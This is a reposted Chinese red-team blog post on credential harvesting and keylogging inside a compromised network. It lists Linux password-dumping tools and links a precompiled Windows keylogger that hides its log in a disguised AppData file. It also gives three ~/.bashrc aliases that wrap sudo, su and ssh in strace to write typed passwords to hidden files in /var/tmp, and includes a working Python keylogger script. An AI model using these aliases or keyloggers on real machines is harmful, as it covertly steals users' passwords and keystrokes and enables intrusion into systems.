内网信息搜集密码读取和键盘记录
2022-9-11 08:10:31 Author: 系统安全运维(查看原文) 阅读量:27 收藏

记录三个我常用的简单的键盘记录和密码读取操作,windows 的密码读取就不多说了,毕竟都很熟悉,主要是 linux 方面,当然还有很多其他的姿势,比如:工具 简介 mimipenguin linux……

记录三个我常用的简单的键盘记录和密码读取操作,windows 的密码读取就不多说了,毕竟都很熟悉,主要是 linux 方面,当然还有很多其他的姿势,比如:
工具
简介


mimipenguin
linux 读密码,类似于 mimikatz,需要 root 权限
Impost3r
Impost3r 是一个利用 C 语言编写,用来窃取 linux 下各类密码(ssh, su, sudo)的工具
swap_digger
swap_digger 是一个 bash 脚本,用于自动化 Linux 交换分析以进行后期利用或取证。它自动进行交换提取和搜索 Linux 用户凭据、Web 表单凭据、Web 表单电子邮件、HTTP 基本身份验证、WiFi SSID 和密钥等
tcpdump
抓取数据包进行分析,获取明文账号密码,比如 ftp、telnet、http

keylogger

项目地址:https://github.com/uknowsec/keylogger

windows 已编译下载地址:https://oss.zjun.info/file/keylogger.exe

可以支持通过传入 Aliyun Access Key 实现定时回传,但是会有泄露风险,直接不加任何参数运行键盘记录数据保存在目标本地即可。

保存数据路径:

C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp

strace

strace 一般是 Linux 自带的命令,是一个可用于诊断、调试和教学的 Linux 用户空间跟踪器。我们用它来监控用户空间进程和内核的交互,比如系统调用、信号传递、进程状态变更等。可以用此命令来记录密码输入
设置环境变量如在 ~/.bashrc 下添加以下三条 alias,sudo、su、ssh 一般是用得比较多的可以获取密码的点
alias sudo='strace -f -e trace=read,write -o /var/tmp/.sudo-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 32 sudo'
alias su='strace -f -e trace=read,write -o /var/tmp/.su-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 32 su'
alias ssh='strace -f -e trace=read,write -o /var/tmp/.ssh-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 32 ssh'
重新加载添加了环境变量的 ~/.bashrc 文件

python

一个 python 的小脚本,需要桌面环境,mac 也可以使用,但是 mac 需要先添加安全与隐私
import logging
from pynput.keyboard import Listener

logging.basicConfig(filename="/tmp/log.txt", level=logging.DEBUG, format="%(asctime)s: %(message)s")

def on_press(key):
    logging.info(key)

with Listener(on_press=on_press) as listener:
    listener.join()

作者:zjun原文地址:https://blog.zjun.info/

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247509808&idx=1&sn=9d052d4c9e2f263fba3200c651873903&chksm=c3087440f47ffd565a5dfe8514186cdfb468ffc0f893c3734d0e6dc63a4f33e7e3a40c385689#rd
如有侵权请联系:admin#unsafe.sh